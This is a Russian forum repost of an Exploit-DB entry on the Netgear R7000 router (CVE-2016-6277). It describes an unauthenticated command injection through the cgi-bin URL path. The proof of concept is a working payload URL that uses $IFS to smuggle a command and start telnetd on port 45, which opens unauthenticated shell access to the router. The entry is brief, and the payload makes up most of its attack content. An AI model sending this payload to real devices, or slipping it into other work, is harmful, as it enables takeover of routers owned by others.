- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 40889
- Проверка EDB
-
- Пройдено
- Автор
- ACEW0RM
- Тип уязвимости
- WEBAPPS
- Платформа
- CGI
- CVE
- cve-2016-6277
- Дата публикации
- 2016-12-07
Netgear R7000 - Command Injection
Код:
# Exploit Title: Netgear R7000 - Command Injection
# Date: 6-12-2016
# Exploit Author: Acew0rm
# Contact: https://twitter.com/Acew0rm1
# Vendor Homepage: https://www.netgear.com/
# Category: Hardware
# Version: V1.0.7.2_1.1.93
-Vulnerability
An unauthenticated user can inject commands threw
http://RouterIP/cgi-bin/;COMMAND.
-Proof Of Concept
http://RouterIP/;telnetd$IFS-p$IFS'45' will open telnet on port 45.
- Источник
- www.exploit-db.com